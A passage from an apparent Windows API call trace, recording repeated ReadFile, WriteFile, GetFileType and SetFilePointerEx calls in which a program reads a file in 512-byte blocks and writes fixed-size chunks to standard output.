(_FileHandle=1) returned 0x4c [0142.076] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.076] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.076] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] GetFileType (hFile=0x4c) returned 0x1 [0142.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.076] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] GetFileType (hFile=0x4c) returned 0x1 [0142.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.077] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.078] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.078] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.078] GetFileType (hFile=0x4c) returned 0x1 [0142.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.078] GetFileType (hFile=0x4c) returned 0x1 [0142.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.078] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.078] GetFileType (hFile=0x4c) returned 0x1 [0142.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] GetFileType (hFile=0x4c) returned 0x1 [0142.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] GetFileType (hFile=0x4c) returned 0x1 [0142.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.330] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.330] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.331] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.331] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] GetFileType (hFile=0x4c) returned 0x1 [0142.331] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.331] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.332] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.332] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] GetFileType (hFile=0x4c) returned 0x1 [0142.332] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.332] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.333] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.333] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.333] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.333] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.334] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.334] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] GetFileType (hFile=0x4c) returned 0x1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.334] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.334] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.335] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.335] ReadFile (in: hFile=0x54, lpBuffer=0x1eede0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1edfd0, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesRead=0x1edfd0*=0x200, lpOverlapped=0x0) returned 1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] GetFileType (hFile=0x4c) returned 0x1 [0142.335] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.335] WriteFile (in: hFile=0x4c, lpBuffer=0x1eede0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eede0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee30*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee30*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eee80*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eee80*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eeed0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eeed0*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef20*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eef70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eef70*, lpNumberOfBytesWritten=0x1edfc4*=0x50, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] GetFileType (hFile=0x4c) returned 0x1 [0142.336] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.336] WriteFile (in: hFile=0x4c, lpBuffer=0x1eefc0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1edfc4, lpOverlapped=0x0 | out: lpBuffer=0x1eefc0*, lpNumberOfBytesWritten=0x1edfc4*=0x20, lpOverlapped=0x0) returned 1 [0142.336] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.336] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1edfb0 | out: lpNewFilePointer=0x0) returned 